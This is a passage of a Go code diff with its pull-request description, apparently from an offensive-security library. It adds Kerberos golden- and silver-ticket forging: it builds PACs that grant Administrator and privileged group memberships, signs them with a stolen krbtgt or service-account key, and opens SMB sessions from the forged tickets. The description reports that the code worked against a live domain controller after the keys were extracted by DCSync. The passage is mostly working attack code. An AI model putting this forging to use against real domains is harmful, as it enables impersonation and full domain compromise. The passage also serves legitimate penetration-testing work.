+		Key               EncryptionKey       `asn1:"explicit,tag:1"`
+		CRealm            string              `asn1:"explicit,tag:2,generalstring"`
+		CName             PrincipalName       `asn1:"explicit,tag:3"`
+		Transited         TransitedEncoding   `asn1:"explicit,tag:4"`
+		AuthTime          time.Time           `asn1:"explicit,tag:5,generalized"`
+		StartTime         time.Time           `asn1:"explicit,tag:6,optional,generalized"`
+		EndTime           time.Time           `asn1:"explicit,tag:7,generalized"`
+		RenewTill         time.Time           `asn1:"explicit,tag:8,optional,generalized"`
+		CAddr             asn1.RawValue       `asn1:"explicit,tag:9,optional"`
+		AuthorizationData []AuthorizationData `asn1:"explicit,tag:10,optional"`
+	}
+	if _, err := asn1.Unmarshal(innerBytes, &inner); err != nil {
+		return 0, err
+	}
+
+	e.Flags = inner.Flags
+	e.Key = inner.Key
+	e.CRealm = inner.CRealm
+	e.CName = inner.CName
+	e.Transited = inner.Transited
+	e.AuthTime = inner.AuthTime
+	e.StartTime = inner.StartTime
+	e.EndTime = inner.EndTime
+	e.RenewTill = inner.RenewTill
+	e.AuthorizationData = inner.AuthorizationData
+	return consumed, nil
+}

--- a/network/kerberos/v5/pac/build.go
+++ b/network/kerberos/v5/pac/build.go
@@ -1,0 +1,284 @@
+package pac
+
+import (
+	"encoding/binary"
+	"fmt"
+	"time"
+
+	"github.com/TheManticoreProject/Manticore/network/dcerpc/ndr"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/iana"
+	msdtyp "github.com/TheManticoreProject/Manticore/windows/ms-dtyp"
+)
+
+// This file builds (forges) a PAC from scratch: it NDR-encodes a
+// KERB_VALIDATION_INFO logon-info buffer, lays out a PAC_CLIENT_INFO buffer, and
+// assembles them with empty server/KDC signature buffers ready for Sign. It is
+// the counterpart to Parse/VerifyServerSignature and underpins golden/silver
+// ticket forging in the parent package.
+//
+// The logon info is serialized with NDR "type serialization version 1"
+// ([MS-RPCE] 2.2.6): a top-level pointer to the structure is marshaled under NDR
+// (little-endian) and wrapped in a CommonTypeHeader + PrivateHeaderForConstructed
+// Type, padded to an 8-octet boundary. Only the logon-info and client-info
+// buffers are emitted; diamond/sapphire forging (which re-uses a legitimately
+// issued PAC and therefore needs full NDR decode of an existing buffer) is out of
+// scope here and tracked separately.
+
+// filetimeEpochDelta is the number of 100-nanosecond intervals between the
+// Windows FILETIME epoch (1601-01-01) and the Unix epoch (1970-01-01).
+const filetimeEpochDelta = 116444736000000000
+
+// FILETIME is the [MS-DTYP] 2.3.3 64-bit timestamp as two 32-bit halves, NDR
+// marshaled as a structure of two ULONGs (little-endian).
+type FILETIME struct {
+	LowDateTime  uint32
+	HighDateTime uint32
+}
+
+// NeverExpireFileTime is the FILETIME value (0x7FFFFFFFFFFFFFFF) used for "never"
+// times such as LogoffTime, KickOffTime, and PasswordMustChange.
+func NeverExpireFileTime() FILETIME {
+	return FILETIME{LowDateTime: 0xFFFFFFFF, HighDateTime: 0x7FFFFFFF}
+}
+
+// FileTimeFromTime converts a Go time to a Windows FILETIME. A zero time maps to
+// a zero FILETIME.
+func FileTimeFromTime(t time.Time) FILETIME {
+	if t.IsZero() {
+		return FILETIME{}
+	}
+	ticks := uint64(t.UTC().UnixNano()/100) + filetimeEpochDelta
+	return FILETIME{LowDateTime: uint32(ticks), HighDateTime: uint32(ticks >> 32)}
+}
+
+// RPC_UNICODE_STRING is the [MS-DTYP] 2.3.10 counted Unicode string. Length and
+// MaximumLength are byte counts; Buffer is a unique pointer to a conformant and
+// varying array of UTF-16LE code units (no NUL terminator). The NDR array counts
+// are derived from Buffer's length, so callers should keep Length ==
+// MaximumLength == 2*len(Buffer) (NewUnicodeString does this).
+type RPC_UNICODE_STRING struct {
+	Length        uint16
+	MaximumLength uint16
+	Buffer        []uint16 `ndr:"unique,varying"`
+}
+
+// NewUnicodeString builds an RPC_UNICODE_STRING from a Go string, encoding it as
+// UTF-16LE with Length and MaximumLength set to its byte length.
+func NewUnicodeString(s string) RPC_UNICODE_STRING {
+	units := utf16Units(s)
+	byteLen := uint16(len(units) * 2)
+	return RPC_UNICODE_STRING{Length: byteLen, MaximumLength: byteLen, Buffer: units}
+}
+
+// GROUP_MEMBERSHIP is the [MS-PAC] 2.2.2 (RID, attributes) pair naming a group
+// the account belongs to in a domain.
+type GROUP_MEMBERSHIP struct {
+	RelativeId uint32
+	Attributes uint32
+}
+
+// KERB_SID_AND_ATTRIBUTES is the [MS-PAC] 2.2.1 (SID, attributes) pair used for
+// ExtraSids (groups from domains other than the account domain).
+type KERB_SID_AND_ATTRIBUTES struct {
+	Sid        *msdtyp.RPC_SID `ndr:"unique"`
+	Attributes uint32
+}
+
+// USER_SESSION_KEY is the 16-byte session key ([MS-PAC] 2.2.3). It is zero for
+// [MS-KILE] (Kerberos) authentication.
+type USER_SESSION_KEY struct {
+	Data [16]byte
+}
+
+// KERB_VALIDATION_INFO is the [MS-PAC] 2.5 logon-info structure (ulType
+// 0x00000001). It is a subset of NETLOGON_VALIDATION_SAM_INFO4; the NTLM-specific
+// members (UserSessionKey, the User* flag bits) are zero under Kerberos. The
+// pointer members are [unique]; the size_is arrays are pointers to conformant
+// arrays whose counts follow from the paired *Count field / slice length.
+type KERB_VALIDATION_INFO struct {
+	LogonTime              FILETIME
+	LogoffTime             FILETIME
+	KickOffTime            FILETIME
+	PasswordLastSet        FILETIME
+	PasswordCanChange      FILETIME
+	PasswordMustChange     FILETIME
+	EffectiveName          RPC_UNICODE_STRING
+	FullName               RPC_UNICODE_STRING
+	LogonScript            RPC_UNICODE_STRING
+	ProfilePath            RPC_UNICODE_STRING
+	HomeDirectory          RPC_UNICODE_STRING
+	HomeDirectoryDrive     RPC_UNICODE_STRING
+	LogonCount             uint16
+	BadPasswordCount       uint16
+	UserId                 uint32
+	PrimaryGroupId         uint32
+	GroupCount             uint32
+	GroupIds               []GROUP_MEMBERSHIP `ndr:"unique,size_is=GroupCount"`
+	UserFlags              uint32
+	UserSessionKey         USER_SESSION_KEY
+	LogonServer            RPC_UNICODE_STRING
+	LogonDomainName        RPC_UNICODE_STRING
+	LogonDomainId          *msdtyp.RPC_SID `ndr:"unique"`
+	Reserved1              [2]uint32
+	UserAccountControl     uint32
+	SubAuthStatus          uint32
+	LastSuccessfulILogon   FILETIME
+	LastFailedILogon       FILETIME
+	FailedILogonCount      uint32
+	Reserved3              uint32
+	SidCount               uint32
+	ExtraSids              []KERB_SID_AND_ATTRIBUTES `ndr:"unique,size_is=SidCount"`
+	ResourceGroupDomainSid *msdtyp.RPC_SID           `ndr:"unique"`
+	ResourceGroupCount     uint32
+	ResourceGroupIds       []GROUP_MEMBERSHIP `ndr:"unique,size_is=ResourceGroupCount"`
+}
+
+// kerbValidationInfoTop wraps the structure in a top-level [unique] pointer so
+// NDR emits the leading referent id ([MS-RPCE] type serialization serializes a
+// pointer to the constructed type), matching a Windows-issued PAC's logon-info
+// buffer.
+type kerbValidationInfoTop struct {
+	Info *KERB_VALIDATION_INFO `ndr:"unique"`
+}
+
+// MarshalKerbValidationInfo NDR-encodes the logon info under type serialization
+// version 1 ([MS-RPCE] 2.2.6): the CommonTypeHeader and PrivateHeaderForConstruct
+// edType frame the NDR body, which is padded to an 8-octet boundary.
+func MarshalKerbValidationInfo(info *KERB_VALIDATION_INFO) ([]byte, error) {
+	body, err := ndr.Marshal(&kerbValidationInfoTop{Info: info})
+	if err != nil {
+		return nil, fmt.Errorf("pac: marshal KERB_VALIDATION_INFO: %w", err)
+	}
+	return wrapTypeSerialization(body), nil
+}
+
+// wrapTypeSerialization prepends the 8-byte CommonTypeHeader and 8-byte
+// PrivateHeaderForConstructedType to an NDR body and pads the body to an 8-octet
+// boundary. ObjectBufferLength counts the padded body and excludes the two
+// headers ([MS-RPCE] 2.2.6.1/2.2.6.2).
+func wrapTypeSerialization(body []byte) []byte {
+	padded := append([]byte(nil), body...)
+	if rem := len(padded) % 8; rem != 0 {
+		padded = append(padded, make([]byte, 8-rem)...)
+	}
+	out := make([]byte, 16+len(padded))
+	// CommonTypeHeader: Version=1, Endianness=0x10 (little-endian ints, ASCII
+	// chars), CommonHeaderLength=8, Filler=0xCCCCCCCC.
+	out[0] = 0x01
+	out[1] = 0x10
+	binary.LittleEndian.PutUint16(out[2:], 8)
+	binary.LittleEndian.PutUint32(out[4:], 0xCCCCCCCC)
+	// PrivateHeaderForConstructedType: ObjectBufferLength, Filler=0.
+	binary.LittleEndian.PutUint32(out[8:], uint32(len(padded)))
+	binary.LittleEndian.PutUint32(out[12:], 0)
+	copy(out[16:], padded)
+	return out
+}
+
+// UnmarshalKerbValidationInfo decodes a type-serialized logon-info buffer (the
+// output of MarshalKerbValidationInfo, or a Windows PAC's ulType 0x01 buffer)
+// back into a KERB_VALIDATION_INFO. It strips the 16-byte serialization headers
+// and NDR-decodes the body.
+func UnmarshalKerbValidationInfo(data []byte) (*KERB_VALIDATION_INFO, error) {
+	if len(data) < 16 {
+		return nil, fmt.Errorf("pac: logon info too short (%d bytes)", len(data))
+	}
+	var top kerbValidationInfoTop
+	if err := ndr.Unmarshal(data[16:], &top); err != nil {
+		return nil, fmt.Errorf("pac: unmarshal KERB_VALIDATION_INFO: %w", err)
+	}
+	if top.Info == nil {
+		return nil, fmt.Errorf("pac: logon info has a null top-level pointer")
+	}
+	return top.Info, nil
+}
+
+// MarshalClientInfo lays out a PAC_CLIENT_INFO buffer ([MS-PAC] 2.7): a
+// little-endian FILETIME ClientId (the TGT authentication time), a 16-bit
+// NameLength in bytes, and the client account name as UTF-16LE. This buffer is
+// not NDR-encoded.
+func MarshalClientInfo(clientID time.Time, name string) []byte {
+	units := utf16Units(name)
+	nameBytes := make([]byte, len(units)*2)
+	for i, u := range units {
+		binary.LittleEndian.PutUint16(nameBytes[i*2:], u)
+	}
+	ft := FileTimeFromTime(clientID)
+	out := make([]byte, 8+2+len(nameBytes))
+	binary.LittleEndian.PutUint32(out[0:], ft.LowDateTime)
+	binary.LittleEndian.PutUint32(out[4:], ft.HighDateTime)
+	binary.LittleEndian.PutUint16(out[8:], uint16(len(nameBytes)))
+	copy(out[10:], nameBytes)
+	return out
+}
+
+// SignatureTypeForEType returns the PAC signature type ([MS-PAC] 2.8) and its
+// byte length for a signing key of the given Kerberos encryption type: HMAC-MD5
+// for RC4, HMAC-SHA1-96 for the AES enctypes. It reports false for unsupported
+// enctypes.
+func SignatureTypeForEType(etype int) (sigType uint32, size int, ok bool) {
+	switch etype {
+	case iana.ETypeRC4HMAC:
+		return sigHMACMD5, 16, true
+	case iana.ETypeAES128CTSHMACSHA196:
+		return sigHMACSHA1128, 12, true
+	case iana.ETypeAES256CTSHMACSHA196:
+		return sigHMACSHA1256, 12, true
+	default:
+		return 0, 0, false
+	}
+}
+
+// Forge assembles an unsigned PAC from an NDR-encoded logon info and the client
+// principal, with empty server (0x06) and KDC (0x07) signature buffers sized for
+// signEType. Call Sign(serverKey, kdcKey) on the result to fill the signatures
+// and obtain the final marshaled PAC. For a golden ticket both keys are the
+// krbtgt key; for a silver ticket both are the service account key.
+func Forge(info *KERB_VALIDATION_INFO, clientName string, clientAuthTime time.Time, signEType int) (*PAC, error) {
+	sigType, sigSize, ok := SignatureTypeForEType(signEType)
+	if !ok {
+		return nil, fmt.Errorf("pac: cannot forge PAC signatures for etype %d", signEType)
+	}
+	logonInfo, err := MarshalKerbValidationInfo(info)
+	if err != nil {
+		return nil, err
+	}
+	clientInfo := MarshalClientInfo(clientAuthTime, clientName)
+
+	p := &PAC{Buffers: []Buffer{
+		{Type: BufferLogonInfo, Data: logonInfo},
+		{Type: BufferClientInfo, Data: clientInfo},
+		{Type: BufferServerChecksum, Data: newSignatureBuffer(sigType, sigSize)},
+		{Type: BufferKDCChecksum, Data: newSignatureBuffer(sigType, sigSize)},
+	}}
+	return p, nil
+}
+
+// newSignatureBuffer builds a PAC_SIGNATURE_DATA buffer ([MS-PAC] 2.8): a 4-byte
+// SignatureType followed by a zeroed Signature of the given length (Sign fills
+// it in place).
+func newSignatureBuffer(sigType uint32, size int) []byte {
+	b := make([]byte, 4+size)
+	binary.LittleEndian.PutUint32(b, sigType)
+	return b
+}
+
+// DefaultGroupAttributes marks a group as mandatory, enabled by default, and
+// enabled (SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED),
+// the attribute set Windows assigns to a user's group memberships in the PAC.
+const DefaultGroupAttributes uint32 = 0x00000007
+
+// utf16Units encodes a Go string as a slice of UTF-16 code units (native order;
+// the NDR encoder writes them little-endian).
+func utf16Units(s string) []uint16 {
+	var units []uint16
+	for _, r := range s {
+		if r <= 0xFFFF {
+			units = append(units, uint16(r))
+			continue
+		}
+		r -= 0x10000
+		units = append(units, 0xD800+uint16(r>>10), 0xDC00+uint16(r&0x3FF))
+	}
+	return units
+}

--- a/network/kerberos/v5/pac/build_test.go
+++ b/network/kerberos/v5/pac/build_test.go
@@ -1,0 +1,192 @@
+package pac
+
+import (
+	"bytes"
+	"encoding/binary"
+	"testing"
+	"time"
+
+	msdtyp "github.com/TheManticoreProject/Manticore/windows/ms-dtyp"
+)
+
+func sampleInfo(t *testing.T) *KERB_VALIDATION_INFO {
+	t.Helper()
+	dom, err := msdtyp.ParseSID("S-1-5-21-1111111111-2222222222-3333333333")
+	if err != nil {
+		t.Fatalf("ParseSID: %v", err)
+	}
+	extra, err := msdtyp.ParseSID("S-1-5-21-1111111111-2222222222-3333333333-519")
+	if err != nil {
+		t.Fatalf("ParseSID extra: %v", err)
+	}
+	never := NeverExpireFileTime()
+	return &KERB_VALIDATION_INFO{
+		LogonTime:          FileTimeFromTime(time.Unix(1700000000, 0)),
+		LogoffTime:         never,
+		KickOffTime:        never,
+		PasswordMustChange: never,
+		EffectiveName:      NewUnicodeString("Administrator"),
+		FullName:           NewUnicodeString(""),
+		LogonScript:        NewUnicodeString(""),
+		ProfilePath:        NewUnicodeString(""),
+		HomeDirectory:      NewUnicodeString(""),
+		HomeDirectoryDrive: NewUnicodeString(""),
+		UserId:             500,
+		PrimaryGroupId:     513,
+		GroupCount:         3,
+		GroupIds: []GROUP_MEMBERSHIP{
+			{RelativeId: 513, Attributes: DefaultGroupAttributes},
+			{RelativeId: 512, Attributes: DefaultGroupAttributes},
+			{RelativeId: 519, Attributes: DefaultGroupAttributes},
+		},
+		UserFlags:          0x20,
+		LogonServer:        NewUnicodeString("DC01"),
+		LogonDomainName:    NewUnicodeString("CORP"),
+		LogonDomainId:      &dom,
+		UserAccountControl: 0x00010200,
+		SidCount:           1,
+		ExtraSids: []KERB_SID_AND_ATTRIBUTES{
+			{Sid: &extra, Attributes: DefaultGroupAttributes},
+		},
+	}
+}
+
+func TestKerbValidationInfoRoundtrip(t *testing.T) {
+	info := sampleInfo(t)
+	data, err := MarshalKerbValidationInfo(info)
+	if err != nil {
+		t.Fatalf("MarshalKerbValidationInfo: %v", err)
+	}
+
+	// Type-serialization header sanity ([MS-RPCE] 2.2.6).
+	if data[0] != 0x01 || data[1] != 0x10 {
+		t.Errorf("common header version/endianness = %#x %#x, want 0x01 0x10", data[0], data[1])
+	}
+	if binary.LittleEndian.Uint16(data[2:]) != 8 {
+		t.Errorf("CommonHeaderLength = %d, want 8", binary.LittleEndian.Uint16(data[2:]))
+	}
+	if binary.LittleEndian.Uint32(data[4:]) != 0xCCCCCCCC {
+		t.Errorf("common header filler = %#x, want 0xCCCCCCCC", binary.LittleEndian.Uint32(data[4:]))
+	}
+	objLen := binary.LittleEndian.Uint32(data[8:])
+	if int(objLen) != len(data)-16 {
+		t.Errorf("ObjectBufferLength = %d, want %d", objLen, len(data)-16)
+	}
+	if len(data)%8 != 0 {
+		t.Errorf("serialized logon info not 8-octet aligned: %d bytes", len(data))
+	}
+
+	got, err := UnmarshalKerbValidationInfo(data)
+	if err != nil {
+		t.Fatalf("UnmarshalKerbValidationInfo: %v", err)
+	}
+	if got.UserId != 500 || got.PrimaryGroupId != 513 || got.GroupCount != 3 {
+		t.Errorf("scalars mismatch: UserId=%d PrimaryGroupId=%d GroupCount=%d", got.UserId, got.PrimaryGroupId, got.GroupCount)
+	}
+	if got.EffectiveName.Length != uint16(2*len("Administrator")) {
+		t.Errorf("EffectiveName.Length = %d, want %d", got.EffectiveName.Length, 2*len("Administrator"))
+	}
+	if s := decodeUTF16(got.EffectiveName.Buffer); s != "Administrator" {
+		t.Errorf("EffectiveName = %q, want Administrator", s)
+	}
+	if len(got.GroupIds) != 3 || got.GroupIds[1].RelativeId != 512 {
+		t.Errorf("GroupIds mismatch: %+v", got.GroupIds)
+	}
+	if got.SidCount != 1 || len(got.ExtraSids) != 1 {
+		t.Fatalf("ExtraSids mismatch: SidCount=%d len=%d", got.SidCount, len(got.ExtraSids))
+	}
+	if got.ExtraSids[0].Sid == nil || got.ExtraSids[0].Sid.String() != "S-1-5-21-1111111111-2222222222-3333333333-519" {
+		t.Errorf("ExtraSids[0] = %v", got.ExtraSids[0].Sid)
+	}
+	if got.LogonDomainId == nil || got.LogonDomainId.String() != "S-1-5-21-1111111111-2222222222-3333333333" {
+		t.Errorf("LogonDomainId = %v", got.LogonDomainId)
+	}
+}
+
+func TestForgeAndSignPAC(t *testing.T) {
+	key := bytes.Repeat([]byte{0x42}, 16) // RC4 NT hash
+	info := sampleInfo(t)
+
+	p, err := Forge(info, "Administrator", time.Unix(1700000000, 0), 23)
+	if err != nil {
+		t.Fatalf("Forge: %v", err)
+	}
+	signed, err := p.Sign(key, key)
+	if err != nil {
+		t.Fatalf("Sign: %v", err)
+	}
+
+	parsed, err := Parse(signed)
+	if err != nil {
+		t.Fatalf("Parse: %v", err)
+	}
+	if _, ok := parsed.Buffer(BufferLogonInfo); !ok {
+		t.Error("no logon info buffer")
+	}
+	if _, ok := parsed.Buffer(BufferClientInfo); !ok {
+		t.Error("no client info buffer")
+	}
+	if err := parsed.VerifyServerSignature(key); err != nil {
+		t.Errorf("server signature: %v", err)
+	}
+	if err := parsed.VerifyKDCSignature(key); err != nil {
+		t.Errorf("KDC signature: %v", err)
+	}
+
+	// The logon info recovered from the signed PAC must still decode.
+	lb, _ := parsed.Buffer(BufferLogonInfo)
+	if _, err := UnmarshalKerbValidationInfo(lb.Data); err != nil {
+		t.Errorf("logon info in signed PAC did not decode: %v", err)
+	}
+}
+
+func TestClientInfoLayout(t *testing.T) {
+	ci := MarshalClientInfo(time.Unix(1700000000, 0), "Administrator")
+	nameLen := binary.LittleEndian.Uint16(ci[8:])
+	if int(nameLen) != 2*len("Administrator") {
+		t.Errorf("NameLength = %d, want %d", nameLen, 2*len("Administrator"))
+	}
+	if len(ci) != 10+int(nameLen) {
+		t.Errorf("client info length = %d, want %d", len(ci), 10+int(nameLen))
+	}
+	if decodeUTF16LEBytes(ci[10:]) != "Administrator" {
+		t.Errorf("client name = %q", decodeUTF16LEBytes(ci[10:]))
+	}
+}
+
+func TestSignatureTypeForEType(t *testing.T) {
+	cases := []struct {
+		etype   int
+		sigType uint32
+		size    int
+	}{
+		{23, 0xFFFFFF76, 16},
+		{17, 0x0000000F, 12},
+		{18, 0x00000010, 12},
+	}
+	for _, c := range cases {
+		st, sz, ok := SignatureTypeForEType(c.etype)
+		if !ok || st != c.sigType || sz != c.size {
+			t.Errorf("etype %d: got (%#x,%d,%v), want (%#x,%d,true)", c.etype, st, sz, ok, c.sigType, c.size)
+		}
+	}
+	if _, _, ok := SignatureTypeForEType(999); ok {
+		t.Error("expected unsupported etype to report false")
+	}
+}
+
+func decodeUTF16(units []uint16) string {
+	var b []rune
+	for _, u := range units {
+		b = append(b, rune(u))
+	}
+	return string(b)
+}
+
+func decodeUTF16LEBytes(b []byte) string {
+	var r []rune
+	for i := 0; i+1 < len(b); i += 2 {
+		r = append(r, rune(binary.LittleEndian.Uint16(b[i:])))
+	}
+	return string(r)
+}

--- a/network/kerberos/v5/spnego_mechanism.go
+++ b/network/kerberos/v5/spnego_mechanism.go
@@ -34,7 +34,9 @@ func NewSPNEGOMechanism(client *KerberosClient, spn string) *SPNEGOMechanism {
 // authentication is requested and an initiator subkey is asserted (as Windows
 // GSS clients do).
 func (m *SPNEGOMechanism) InitToken() ([]byte, error) {
-	if !m.client.hasTGT {
+	// A preloaded (forged silver / captured) service ticket for the SPN needs no
+	// TGT; otherwise acquire one if we do not already hold it.
+	if !m.client.hasTGT && !m.client.hasPreloadedServiceTicket(m.spn) {
 		if err := m.client.GetTGT(); err != nil {
 			return nil, fmt.Errorf("kerberos spnego: GetTGT: %w", err)
 		}

--- a/network/smb/smb_v20/client/session_kerberos.go
+++ b/network/smb/smb_v20/client/session_kerberos.go
@@ -52,8 +52,43 @@ func (c *Client) SessionSetupKerberos(creds *credentials.Credentials, kdcHost, s
 		kc.WithPassword(creds.GetPassword())
 	}
 
-	mech := kerberos.NewSPNEGOMechanism(kc, spn)
+	return c.sessionSetupKerberosMechanism(kerberos.NewSPNEGOMechanism(kc, spn), creds)
+}
 
+// SessionSetupKerberosWithClient authenticates the session using a caller-built
+// native Kerberos client, targeting service principal spn. Unlike
+// SessionSetupKerberos it does not construct the client from a password/NT hash,
+// so it drives pass-the-ticket and forged-ticket flows: a golden TGT imported
+// with LoadTGT (the client then obtains the service ticket from the KDC) or a
+// forged silver service ticket wired in with LoadServiceTicket (used directly,
+// with no KDC round-trip). The client already carries the KDC host and identity.
+func (c *Client) SessionSetupKerberosWithClient(kc *kerberos.KerberosClient, spn string) error {
+	if kc == nil {
+		return fmt.Errorf("session setup requires a Kerberos client but none was provided")
+	}
+	if !c.Transport.IsConnected() {
+		return fmt.Errorf("transport is not connected")
+	}
+	if spn == "" {
+		spn = "cifs/" + c.Connection.Server.DNSComputerName
+	}
+	if spn == "cifs/" {
+		return fmt.Errorf("kerberos session setup requires a service principal name (or a known server name)")
+	}
+	// Synthesize the credential record the session stores from the client's own
+	// identity; the password is unused on the Kerberos path (the mechanism drives
+	// the exchange).
+	creds, err := credentials.NewCredentials(kc.Realm(), kc.Username(), "", "")
+	if err != nil {
+		return fmt.Errorf("kerberos session setup: %w", err)
+	}
+	return c.sessionSetupKerberosMechanism(kerberos.NewSPNEGOMechanism(kc, spn), creds)
+}
+
+// sessionSetupKerberosMechanism runs the single-leg SPNEGO/Kerberos SESSION_SETUP
+// exchange for a prepared mechanism, shared by SessionSetupKerberos (client built
+// from credentials) and SessionSetupKerberosWithClient (caller-supplied client).
+func (c *Client) sessionSetupKerberosMechanism(mech *kerberos.SPNEGOMechanism, creds *credentials.Credentials) error {
 	// SMB2 always uses Unicode for its strings.
 	authCtx := spnego.NewAuthContext(
 		spnego.AuthTypeKerberos,


### PR DESCRIPTION
### Linked Issue
`Closes #909`

### Summary
Adds native golden- and silver-ticket forging on top of the already-merged PAC, message, and crypto building blocks. A golden ticket is a TGT for `krbtgt/REALM` signed with the domain krbtgt key; a silver ticket is a single service ticket signed with a service account key. The caller supplies the compromised key (RC4 NT hash or AES key), realm, target identity (user / RID / SID / group RIDs), SPN (silver), and validity window.

### Implementation
- `pac.Forge`, `pac.MarshalKerbValidationInfo`, `pac.MarshalClientInfo`: build and NDR "type serialization version 1" ([MS-RPCE] 2.2.6) encode a `KERB_VALIDATION_INFO` logon-info buffer ([MS-PAC] 2.5) plus a `PAC_CLIENT_INFO` buffer ([MS-PAC] 2.7), with server (0x06) and KDC (0x07) signature buffers sized from the signing-key etype and filled by the existing PAC `Sign` path. For a golden ticket both signatures use the krbtgt key; for a silver ticket both use the service key.
- `messages.EncTicketPart`: RFC 4120 §5.3 ticket enc-part marshal/unmarshal (flags, session key, cname/crealm, times, authorization-data).
- `kerberos.ForgeGolden` / `ForgeSilver`: assemble the PAC into `AD-IF-RELEVANT → AD-WIN2K-PAC`, encrypt the enc-part under the supplied key (key usage 2), and emit a `Ticket` + `KrbCredInfo` that the existing `.kirbi`/ccache export and import paths consume.
- `KerberosClient.LoadServiceTicket` / `LoadForgedServiceTicket`: wire a forged/captured service ticket in so `GetTGS` returns it with no KDC round-trip (silver pass-the-ticket); the SPNEGO mechanism skips TGT acquisition when a matching preloaded ticket is present, and the client adopts the ticket's client identity so the AP-REQ authenticator matches.
- SMB2 client `SessionSetupKerberosWithClient`: drives SESSION_SETUP from a caller-supplied Kerberos client (a forged/imported ticket), the password/hash-free companion to `SessionSetupKerberos`.

Diamond and sapphire tickets — which re-use a legitimately issued PAC and so require full NDR decode of an existing `KERB_VALIDATION_INFO` — are intentionally out of scope here and tracked separately (noted in a code comment).

### How Verified
- Cross-checked structure/placement/key-usages against MS-PAC (KERB_VALIDATION_INFO, PAC_CLIENT_INFO, PAC signatures §2.8), MS-RPCE type serialization v1, and RFC 4120.
- `go build ./...`, `go vet ./network/kerberos/... ./network/smb/smb_v20/...`, and `go test ./network/kerberos/... ./network/smb/smb_v20/...` all pass.
- Live-validated against a Windows Server 2016 DC: obtained the krbtgt and machine-account keys via the repo's DRSUAPI DCSync, then
  - forged a **golden** TGT for Administrator, imported it, and the KDC issued a real `cifs/…` service ticket; a full Kerberos SMB2 session to `\\DC\C$` was established.
  - forged a **silver** `cifs/…` ticket with the machine key and opened an authenticated SMB2 session to `\\DC\C$` directly, with no KDC round-trip.

### Test Coverage
- **Added:** `pac/build_test.go` (`TestKerbValidationInfoRoundtrip`, `TestForgeAndSignPAC`, `TestClientInfoLayout`, `TestSignatureTypeForEType`) and `forge_test.go` (`TestForgeGoldenStructure`, `TestForgeSilverStructure`, `TestForgeGoldenIsInitial`, `TestForgeValidation`) — KDC-free: forge a ticket, re-parse the EncTicketPart, and verify the embedded PAC server/KDC signatures and the KERB_VALIDATION_INFO NDR round-trip.

### Scope of Change
- **Files changed:** `network/kerberos/v5/pac/build.go` (+test), `network/kerberos/v5/messages/encticketpart.go`, `network/kerberos/v5/forge.go` (+test), `network/kerberos/v5/client.go`, `network/kerberos/v5/import.go`, `network/kerberos/v5/spnego_mechanism.go`, `network/smb/smb_v20/client/session_kerberos.go`.
- **Submodule pointer updated:** no.
- **Behavioral changes outside the forging feature:** none — the client/mechanism/SMB additions are new entry points; existing paths are unchanged apart from a preloaded-ticket short-circuit in `GetTGS`.

### Notes
No new external dependencies (pure Go standard library).